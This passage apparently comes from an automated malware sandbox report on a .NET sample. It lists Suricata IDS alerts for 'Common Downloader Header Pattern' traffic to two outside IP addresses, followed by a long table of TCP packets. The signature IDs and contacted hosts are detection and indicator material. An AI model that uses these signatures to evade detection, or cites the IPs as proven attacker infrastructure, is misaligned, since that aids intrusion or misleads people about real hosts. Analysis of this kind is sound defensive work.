mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-14T11:05:22.362721+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49710	158.101.44.242	80	TCP
2024-10-14T11:05:23.298818+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49710	158.101.44.242	80	TCP
2024-10-14T11:05:23.880546+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49712	188.114.97.3	443	TCP
2024-10-14T11:05:24.533245+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49714	158.101.44.242	80	TCP
2024-10-14T11:05:25.097785+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49715	188.114.97.3	443	TCP
2024-10-14T11:05:25.595532+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49716	158.101.44.242	80	TCP
2024-10-14T11:05:26.321261+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49720	188.114.97.3	443	TCP
2024-10-14T11:05:26.366641+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49716	158.101.44.242	80	TCP
2024-10-14T11:05:27.722330+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49721	188.114.97.3	443	TCP
2024-10-14T11:05:28.376952+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49724	158.101.44.242	80	TCP
2024-10-14T11:05:31.427755+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49732	188.114.97.3	443	TCP
2024-10-14T11:05:34.228411+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49745	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 11:05:21.542335987 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:21.548559904 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:21.548641920 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:21.549211025 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:21.555298090 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:22.142424107 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:22.148425102 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:22.153429031 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:22.306451082 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:22.362720966 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:22.416672945 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:22.416728973 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:22.417006969 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:22.433923960 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:22.433947086 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:22.908993006 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:22.909097910 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:22.914845943 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:22.914865017 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:22.915345907 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:22.970694065 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:22.978272915 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.019433975 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.086859941 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.087188005 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.087253094 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.093986034 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.098743916 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.103738070 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:23.256577969 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:23.261332989 CEST	49712	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.261396885 CEST	443	49712	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.261823893 CEST	49712	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.262165070 CEST	49712	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.262183905 CEST	443	49712	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.298818111 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.729579926 CEST	443	49712	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.736042023 CEST	49712	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.736079931 CEST	443	49712	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.880590916 CEST	443	49712	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.882239103 CEST	443	49712	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:23.882323027 CEST	49712	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.882855892 CEST	49712	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:23.886713028 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.887928963 CEST	49714	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.891985893 CEST	80	49710	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:23.892035007 CEST	49710	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.892844915 CEST	80	49714	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:23.893019915 CEST	49714	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.893131971 CEST	49714	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:23.897895098 CEST	80	49714	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:24.482265949 CEST	80	49714	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:24.483916998 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:24.483973980 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:24.484040022 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:24.484316111 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:24.484327078 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:24.533245087 CEST	49714	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:24.642102957 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:24.647116899 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:24.647191048 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:24.654246092 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:24.659245968 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:24.952717066 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:24.954648972 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:24.954684019 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.097800970 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.097910881 CEST	443	49715	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.098033905 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.098499060 CEST	49715	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.104103088 CEST	49718	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:25.109015942 CEST	80	49718	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.109097958 CEST	49718	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:25.109234095 CEST	49718	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:25.114479065 CEST	80	49718	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.222219944 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.230542898 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:25.235621929 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.386651039 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.431675911 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.431718111 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.431854010 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.437805891 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.437829018 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.595448017 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.595531940 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:25.694408894 CEST	80	49718	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:25.695883036 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.695930004 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.696053982 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.696434021 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.696458101 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.736318111 CEST	49718	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:25.914664030 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.914766073 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.923460960 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:25.923480034 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.923837900 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:25.976924896 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.019402027 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.086252928 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.086358070 CEST	443	49719	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.086569071 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.089598894 CEST	49719	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.093873978 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.098819971 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:26.168735981 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.170766115 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.170802116 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.254314899 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:26.257364035 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.257416010 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.257616997 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.257944107 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.257956028 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.321259022 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.321391106 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.321517944 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.322256088 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.327167034 CEST	49718	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.327840090 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.332273960 CEST	80	49718	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:26.332365990 CEST	49718	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.332611084 CEST	80	49722	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:26.335257053 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.335366011 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.340135098 CEST	80	49722	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:26.366641045 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:26.743987083 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:26.746005058 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:26.746051073 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:27.722140074 CEST	80	49722	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:27.722325087 CEST	80	49722	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:27.722332954 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:27.722369909 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.722470045 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:27.722533941 CEST	80	49722	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:27.722559929 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:27.722573996 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.723340034 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:27.723757982 CEST	49723	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:27.723798990 CEST	443	49723	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:27.723902941 CEST	49723	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:27.724308968 CEST	49723	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:27.724332094 CEST	443	49723	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:27.727134943 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.728267908 CEST	49724	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.732306957 CEST	80	49716	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:27.732352018 CEST	49716	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.733067989 CEST	80	49724	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:27.733222961 CEST	49724	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.733222961 CEST	49724	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:27.738033056 CEST	80	49724	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.190206051 CEST	443	49723	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.191946030 CEST	49723	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.191973925 CEST	443	49723	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.326275110 CEST	80	49724	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.329977036 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.330030918 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.330163956 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.330534935 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.330544949 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.332216024 CEST	443	49723	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.332317114 CEST	443	49723	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.332973003 CEST	49723	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.332973003 CEST	49723	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.336924076 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.338179111 CEST	49726	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.342401028 CEST	80	49722	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.342458963 CEST	49722	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.343050957 CEST	80	49726	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.343112946 CEST	49726	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.343249083 CEST	49726	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.348040104 CEST	80	49726	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.376951933 CEST	49724	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.807792902 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.809593916 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.809628010 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.925517082 CEST	80	49726	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.927251101 CEST	49727	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.927297115 CEST	443	49727	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.927407026 CEST	49727	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.928689957 CEST	49727	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.928704977 CEST	443	49727	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.958003044 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.958132029 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:28.958190918 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.958878040 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:28.964850903 CEST	49728	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.969763994 CEST	80	49728	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:28.970026970 CEST	49728	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.970073938 CEST	49728	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.970695972 CEST	49726	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:28.974955082 CEST	80	49728	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:29.393951893 CEST	443	49727	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:29.396143913 CEST	49727	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:29.396178961 CEST	443	49727	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:29.543766022 CEST	443	49727	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:29.543859959 CEST	443	49727	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:29.543952942 CEST	49727	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:29.544717073 CEST	49727	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:29.549931049 CEST	49726	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:29.551464081 CEST	49729	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:29.555181026 CEST	80	49726	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:29.555402994 CEST	49726	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:29.556370020 CEST	80	49729	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:29.556525946 CEST	49729	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:29.556751966 CEST	49729	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:29.561886072 CEST	80	49729	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:29.562046051 CEST	80	49728	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:29.563637018 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:29.563680887 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:29.563828945 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:29.564138889 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:29.564152956 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:29.611423969 CEST	49728	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:30.037727118 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:30.039747000 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:30.039779902 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:30.177611113 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:30.177772045 CEST	443	49730	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:30.177843094 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:30.178323984 CEST	49730	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:30.183185101 CEST	49728	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:30.187186956 CEST	49731	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:30.188374996 CEST	80	49728	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:30.189120054 CEST	49728	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:30.192187071 CEST	80	49731	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:30.195188046 CEST	49731	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:30.195188046 CEST	49731	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:30.199968100 CEST	80	49731	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:30.799861908 CEST	80	49731	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:30.820916891 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:30.820971012 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:30.821053982 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:30.821398973 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:30.821418047 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:30.845694065 CEST	49731	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.136333942 CEST	80	49729	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:31.137969017 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.138025045 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.138091087 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.138402939 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.138415098 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.189460039 CEST	49729	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.297743082 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.300272942 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.300302029 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.427750111 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.427870035 CEST	443	49732	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.427936077 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.428477049 CEST	49732	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.431919098 CEST	49731	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.433223963 CEST	49735	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.437334061 CEST	80	49731	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:31.437414885 CEST	49731	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.438091040 CEST	80	49735	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:31.438190937 CEST	49735	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.438333988 CEST	49735	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.443245888 CEST	80	49735	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:31.604657888 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.606618881 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.606672049 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.752619028 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.752880096 CEST	443	49733	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:31.752949953 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.753376007 CEST	49733	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:31.757296085 CEST	49729	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.758471012 CEST	49736	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.763317108 CEST	80	49729	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:31.763396025 CEST	80	49736	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:31.763418913 CEST	49729	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.763472080 CEST	49736	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.763582945 CEST	49736	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:31.768369913 CEST	80	49736	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:32.350094080 CEST	80	49736	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:32.351650953 CEST	49739	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:32.351706982 CEST	443	49739	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:32.351783991 CEST	49739	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:32.352046013 CEST	49739	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:32.352061033 CEST	443	49739	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:32.392574072 CEST	49736	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:32.841639996 CEST	443	49739	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:32.844140053 CEST	49739	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:32.844175100 CEST	443	49739	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:32.976428032 CEST	443	49739	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:32.976536989 CEST	443	49739	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:32.976723909 CEST	49739	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:32.977071047 CEST	49739	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:32.982084990 CEST	49736	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:32.983263969 CEST	49742	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:32.987406969 CEST	80	49736	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:32.987536907 CEST	49736	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:32.988181114 CEST	80	49742	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:32.988255024 CEST	49742	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:32.988413095 CEST	49742	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:32.993227959 CEST	80	49742	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:33.014524937 CEST	80	49735	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:33.016319990 CEST	49743	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.016360044 CEST	443	49743	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.016464949 CEST	49743	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.016957998 CEST	49743	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.016968966 CEST	443	49743	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.064727068 CEST	49735	80	192.168.2.8	158.101.44.242
Oct 14, 2024 11:05:33.494637966 CEST	443	49743	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.524790049 CEST	49743	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.524815083 CEST	443	49743	188.114.97.3	192.168.2.8
Oct 14, 2024 11:05:33.573607922 CEST	80	49742	158.101.44.242	192.168.2.8
Oct 14, 2024 11:05:33.588968039 CEST	49745	443	192.168.2.8	188.114.97.3
Oct 14, 2024 11:05:33.588996887 CEST	443	49745	188.114.97.3	192.168.2.8
